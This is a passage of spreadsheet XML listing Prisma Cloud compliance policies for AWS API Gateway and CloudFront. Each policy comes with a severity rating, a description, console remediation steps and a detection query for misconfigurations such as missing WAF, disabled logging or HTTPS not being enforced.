          <t>Data protection</t>
        </is>
      </c>
      <c r="S10" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T10" t="b">
        <v>0</v>
      </c>
      <c r="U10" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V10" t="inlineStr">
        <is>
          <t>aws-apigateway-get-stages</t>
        </is>
      </c>
      <c r="W10" t="inlineStr">
        <is>
          <t>API Gateway can generate an SSL certificate and use its public key in the backend to verify that HTTP requests to your backend system are from API Gateway. This allows your HTTP backend to control and accept only requests originating from Amazon API Gateway, even if the backend is publicly accessible.
Note: Some backend servers may not support SSL client authentication as API Gateway does and could return an SSL certificate error. For a list of incompatible backend servers, see Known Issues. https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-known-issues.html</t>
        </is>
      </c>
      <c r="X10" t="inlineStr">
        <is>
          <t>These instructions assume you already completed Generate a Client Certificate Using the API Gateway Console. If not please generate a client certificate by following below steps and then Configure an API to Use SSL Certificates.
Steps to Generate a Client Certificate Using the API Gateway Console:
1. Login to AWS Console
2. Go to API Gateway console
3. In the main navigation pane (Left Panel), choose Client Certificates.
4. From the Client Certificates pane, choose Generate Client Certificate.
5. Optionally, for Edit, choose to add a descriptive title for the generated certificate and choose Save to save the description. API Gateway generates a new certificate and returns the new certificate GUID, along with the PEM-encoded public key.
Steps to Configure an API to Use SSL Certificates:
1. Login to AWS Console
2. Go to API Gateway console
3. In the API Gateway console, create or open an API for which you want to use the client certificate. Make sure the API has been deployed to a stage (Left Panel).
4. Choose Stages under the selected API and then choose a stage (Left Panel).
5. In the Stage Editor panel, select a certificate under the Client Certificate section.
6. Click Save Changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-51
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-51</t>
        </is>
      </c>
      <c r="Y10" t="inlineStr"/>
      <c r="Z10" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-apigateway-get-stages' AND json.rule = 'clientCertificateId does not exist or clientCertificateId equals None'
{"category":"General","resourceTypes":["aws_api_gateway_stage","aws_apigatewayv2_stage"]}</t>
        </is>
      </c>
      <c r="AA10" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB10" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC10" t="inlineStr">
        <is>
          <t>PC-AWS-API-158-CKV2_AWS_51</t>
        </is>
      </c>
      <c r="AD10" t="b">
        <v>1</v>
      </c>
      <c r="AE10" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF10" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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0" t="inlineStr">
        <is>
          <t>82493c0b-f4d0-4a82-a5b5-a85df8e78e19</t>
        </is>
      </c>
      <c r="AI10" t="inlineStr">
        <is>
          <t>994d466e-fd3a-4a28-8c03-46f017447251</t>
        </is>
      </c>
      <c r="AJ10" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK10" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B11" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C11" s="2" t="inlineStr">
        <is>
          <t>Protective services</t>
        </is>
      </c>
      <c r="D11" t="inlineStr"/>
      <c r="E11" t="inlineStr"/>
      <c r="F11" t="inlineStr"/>
      <c r="G11" t="b">
        <v>1</v>
      </c>
      <c r="H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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>AWS API Gateway REST API not configured with AWS Web Application Firewall v2 (AWS WAFv2)</t>
        </is>
      </c>
      <c r="L11" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M11" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N11" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O11" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P11" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q11" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R11" t="inlineStr">
        <is>
          <t>Protective services</t>
        </is>
      </c>
      <c r="S11" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Protective services</t>
        </is>
      </c>
      <c r="T11" t="b">
        <v>0</v>
      </c>
      <c r="U11" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V11" t="inlineStr">
        <is>
          <t>aws-apigateway-get-stages</t>
        </is>
      </c>
      <c r="W11" t="inlineStr">
        <is>
          <t>This policy identifies AWS API Gateway REST API which is not configured with AWS Web Application Firewall. As a best practice, enable the AWS WAF service on API Gateway REST API to protect against application layer attacks. To block malicious requests to your API Gateway REST API, define the block criteria in the WAF web access control list (web ACL).</t>
        </is>
      </c>
      <c r="X11" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Make sure your the reported API Gateway REST API requires WAF based on your requirement and Note down the API Gateway REST API name
Follow steps given in below URL to associate API Gateway REST API to WAF Web ACL ,
https://docs.aws.amazon.com/waf/latest/developerguide/web-acl-associating-aws-resource.html</t>
        </is>
      </c>
      <c r="Y11" t="inlineStr"/>
      <c r="Z11" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-apigateway-get-stages' AND json.rule = webAclArn does not exist or webAclArn does not start with arn:aws:wafv2</t>
        </is>
      </c>
      <c r="AA11" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB11" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC11" t="inlineStr">
        <is>
          <t>PC-AWS-API-824</t>
        </is>
      </c>
      <c r="AD11" t="b">
        <v>1</v>
      </c>
      <c r="AE11" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF11" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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1" t="inlineStr">
        <is>
          <t>24408300-0278-42d5-949b-179fb7bd95d6</t>
        </is>
      </c>
      <c r="AI11" t="inlineStr">
        <is>
          <t>c71bb3b7-3fa2-4c1d-8956-c38040ecb129</t>
        </is>
      </c>
      <c r="AJ11" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK11" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B12" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C12" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D12" t="inlineStr"/>
      <c r="E12" t="inlineStr"/>
      <c r="F12" t="inlineStr"/>
      <c r="G12" t="b">
        <v>1</v>
      </c>
      <c r="H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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>AWS CloudFront distribution with access logging disabled</t>
        </is>
      </c>
      <c r="L12" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M12" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N12" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O12" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P12" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q12" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R12" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S12" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T12" t="b">
        <v>0</v>
      </c>
      <c r="U12" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V12" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W12" t="inlineStr">
        <is>
          <t>This policy identifies CloudFront distributions which have access logging disabled. Enabling access log on distributions creates log files that contain detailed information about every user request that CloudFront receives. Access logs are available for web distributions. If you enable logging, you can also specify the Amazon S3 bucket that you want CloudFront to save files in.</t>
        </is>
      </c>
      <c r="X12" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to CloudFront Distributions Dashboard
4. Click on the reported distribution
5. On 'General' tab, Click on 'Edit' button
6. On 'Edit Distribution' page, Set 'Logging' to 'On', choose a 'Bucket for Logs' and 'Log Prefix' as desired
7. Click on 'Yes, Edit' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-20
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-20</t>
        </is>
      </c>
      <c r="Y12" t="inlineStr"/>
      <c r="Z12" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = 'logging.enabled is false and logging.bucket is empty'
{"category":"Logging","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA12" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB12" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC12" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-271-CKV_AWS_86</t>
        </is>
      </c>
      <c r="AD12" t="b">
        <v>1</v>
      </c>
      <c r="AE12" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF12" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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2" t="inlineStr">
        <is>
          <t>4a719209-0c06-4f42-a33e-9f0107a76fa9</t>
        </is>
      </c>
      <c r="AI12" t="inlineStr">
        <is>
          <t>81e103d7-6ba6-42d6-ace7-dfdcff88693a</t>
        </is>
      </c>
      <c r="AJ12" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK12" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B13" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C13" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D13" t="inlineStr"/>
      <c r="E13" t="inlineStr"/>
      <c r="F13" t="inlineStr"/>
      <c r="G13" t="b">
        <v>1</v>
      </c>
      <c r="H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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>AWS CloudFront origin protocol policy does not enforce HTTPS-only</t>
        </is>
      </c>
      <c r="L13" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M13" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N13" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O13" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P13" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q13" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R13" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S13" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T13" t="b">
        <v>0</v>
      </c>
      <c r="U13" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V13" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W13" t="inlineStr">
        <is>
          <t>This policy identifies AWS CloudFront which has an origin protocol policy that does not enforce HTTPS-only. Enforcing HTTPS protocol policy between origin and CloudFront will encrypt all communication and will be more secure. As a security best practice, enforce HTTPS-only traffic between a CloudFront distribution and the origin.</t>
        </is>
      </c>
      <c r="X13" t="inlineStr">
        <is>
          <t>Communication between CloudFront and your Custom Origin should enforce HTTPS-only traffic. Modify the CloudFront Origin's Origin Protocol Policy to HTTPS only.
1. Go to the AWS console CloudFront dashboard.
2. Select your distribution Id.
3. Select the 'Origins' tab.
4. Check the origin you want to modify then select Edit.
5. Change the Origin Protocol Policy to 'https-only.'
6. Select 'Yes, Edit.'</t>
        </is>
      </c>
      <c r="Y13" t="inlineStr"/>
      <c r="Z13" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = enabled is true and origins.items[*] contains customOriginConfig and origins.items[?any(customOriginConfig.originProtocolPolicy does not contain https-only and ( domainName contains ".data.mediastore." or domainName contains ".mediapackage." or domainName contains ".elb." ))] exists</t>
        </is>
      </c>
      <c r="AA13" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB13" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC13" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-257</t>
        </is>
      </c>
      <c r="AD13" t="b">
        <v>1</v>
      </c>
      <c r="AE13" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF13" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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3" t="inlineStr">
        <is>
          <t>366ac171-3066-46d3-a32f-df80b0a9fe56</t>
        </is>
      </c>
      <c r="AI13" t="inlineStr">
        <is>
          <t>701c180d-c57a-4cc0-bf1b-93d7c5c1a488</t>
        </is>
      </c>
      <c r="AJ13" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK13" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B14" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C14" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D14" t="inlineStr"/>
      <c r="E14" t="inlineStr"/>
      <c r="F14" t="inlineStr"/>
      <c r="G14" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>AWS CloudFront web distribution with default SSL certificate</t>
        </is>
      </c>
      <c r="L14" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M14" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N14" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O14" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P14" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q14" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R14" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S14" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T14" t="b">
        <v>0</v>
      </c>
      <c r="U14" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V14" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W14" t="inlineStr">
        <is>
          <t>This policy identifies CloudFront web distributions which have a default SSL certificate to access CloudFront content. It is a best practice to use custom SSL Certificate to access CloudFront content. It gives you full control over the content data. custom SSL certificates also allow your users to access your content by using an alternate domain name. You can use a certificate stored in AWS Certificate Manager (ACM) or you can use a certificate stored in IAM.</t>
        </is>
      </c>
      <c r="X14" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Select the region, from the region drop-down, in which the alert is generated
3. Navigate to CloudFront Distributions Dashboard
4. Click on the reported distribution
5. On the 'General' tab, Click on the 'Edit' button
6. On 'Edit Distribution' page set 'SSL Certificate' to 'Custom SSL Certificate (example.com):', Select a certificate or type your certificate ARN in the field and other parameters as per your requirement.
7. Click on 'Yes, Edit' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate</t>
        </is>
      </c>
      <c r="Y14" t="inlineStr"/>
      <c r="Z14" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = 'viewerCertificate.certificateSource contains cloudfront'
{"category":"Networking","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA14" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB14" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC14" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-349-CKV2_AWS_42</t>
        </is>
      </c>
      <c r="AD14" t="b">
        <v>1</v>
      </c>
      <c r="AE14" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF14" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>a072bd68-25cd-4245-94e1-fffee0590a50</t>
        </is>
      </c>
      <c r="AI14" t="inlineStr">
        <is>
          <t>64519df3-368a-4329-a67a-4f2059f8eb5c</t>
        </is>
      </c>
      <c r="AJ14" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK14" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B15" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C15" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D15" t="inlineStr"/>
      <c r="E15" t="inlineStr"/>
      <c r="F15" t="inlineStr"/>
      <c r="G15" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J15" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K15" t="inlineStr">
        <is>
          <t>AWS CloudFront viewer protocol policy is not configured with HTTPS</t>
        </is>
      </c>
      <c r="L15" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M15" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N15" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O15" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P15" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q15" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R15" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S15" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud,Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T15" t="b">
        <v>0</v>
      </c>
      <c r="U15" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V15" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W15" t="inlineStr">
        <is>
          <t>For web distributions, you can configure CloudFront to require that viewers use HTTPS to request your objects, so connections are encrypted when CloudFront communicates with viewers.</t>
        </is>
      </c>
      <c r="X15" t="inlineStr">
        <is>
          <t>Configure CloudFront to require HTTPS between viewers and CloudFront.
1. Go to the AWS console CloudFront dashboard.
2. Select your distribution Id.
3. Select the 'Behaviors' tab.
4. Check the behavior you want to modify then select Edit.
5. Choose 'HTTPS Only' or 'Redirect HTTP to HTTPS' for Viewer Protocol Policy.
6. Select 'Yes, Edit.' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-32
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-32</t>
        </is>
      </c>
      <c r="Y15" t="inlineStr"/>
      <c r="Z15" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = defaultCacheBehavior.viewerProtocolPolicy contains "allow-all" or cacheBehaviors.items[?any( viewerProtocolPolicy contains "allow-all" )] exists
{"category":"Networking","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA15" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB15" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC15" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-255-CKV_AWS_34</t>
        </is>
      </c>
      <c r="AD15" t="b">
        <v>1</v>
      </c>
      <c r="AE15" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF15" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>d183c5cd-6fe6-43a9-8fbf-6b4e44c84ec9</t>
        </is>
      </c>
      <c r="AI15" t="inlineStr">
        <is>
          <t>2cc26fd5-4a45-427e-a3d6-53d77c1790af</t>
        </is>
      </c>
      <c r="AJ15" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK15" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B16" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C16" s="2" t="inlineStr">
        <is>
          <t>Protective services</t>
        </is>
      </c>
      <c r="D16" t="inlineStr"/>
      <c r="E16" t="inlineStr"/>
      <c r="F16" t="inlineStr"/>
      <c r="G16" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J16" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K16" t="inlineStr">
        <is>
          <t>AWS CloudFront web distribution with AWS Web Application Firewall (AWS WAF) service disabled</t>
        </is>
      </c>
      <c r="L16" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M16" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N16" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O16" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P16" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q16" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R16" t="inlineStr">
        <is>
          <t>Protective services</t>
        </is>
      </c>
      <c r="S16" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Protective services</t>
        </is>
      </c>
      <c r="T16" t="b">
        <v>0</v>
      </c>
      <c r="U16" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V16" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W16" t="inlineStr">
        <is>
          <t>This policy identifies Amazon CloudFront web distributions which have the AWS Web Application Firewall (AWS WAF) service disabled. As a best practice, enable the AWS WAF service on CloudFront web distributions to protect against application layer attacks. To block malicious requests to your Cloudfront Content Delivery Network, define the block criteria in the WAF web access control list (web ACL).</t>
        </is>
      </c>
      <c r="X16" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Go to the CloudFront Distributions Dashboard
3. Click on the reported web distribution
4. On 'General' tab, Click on 'Edit' button
5. On 'Edit Distribution' page, Choose a 'AWS WAF Web ACL' from dropdown.
6. Click on 'Yes, Edit' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27</t>
        </is>
      </c>
      <c r="Y16" t="inlineStr"/>
      <c r="Z16" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudfront-list-distributions' AND json.rule = 'webACLId is empty'
{"category":"General","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA16" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB16" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC16" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-344-CKV_AWS_68</t>
        </is>
      </c>
      <c r="AD16" t="b">
        <v>1</v>
      </c>
      <c r="AE16" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF16" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>a1152fef-3480-45bf-a7dd-eb4de3ed9943</t>
        </is>
      </c>
      <c r="AI16" t="inlineStr">
        <is>
          <t>6cec2122-f991-4109-99e6-a49f33fc9b9e</t>
        </is>
      </c>
      <c r="AJ16" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK16" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B17" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C17" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D17" t="inlineStr"/>
      <c r="E17" t="inlineStr"/>
      <c r="F17" t="inlineStr"/>
      <c r="G17" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J17" t="inlineStr">
        <is>
          <t>aws-cloudfront</t>
        </is>
      </c>
      <c r="K17" t="inlineStr">
        <is>
          <t>AWS Cloudfront Distribution with S3 have Origin Access set to disabled</t>
        </is>
      </c>
      <c r="L17" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M17" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N17" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O17" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P17" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q17" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R17" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S17" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T17" t="b">
        <v>0</v>
      </c>
      <c r="U17" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V17" t="inlineStr">
        <is>
          <t>aws-cloudfront-list-distributions</t>
        </is>
      </c>
      <c r="W17" t="inlineStr">
        <is>
          <t>This policy identifies the AWS CloudFront distributions which are utilizing S3 bucket and have Origin Access Disabled. The origin access identity feature should be enabled for all your AWS CloudFront CDN distributions in order to restrict any direct access to your objects through Amazon S3 URLs.</t>
        </is>
      </c>
      <c r="X17" t="inlineStr">
        <is>
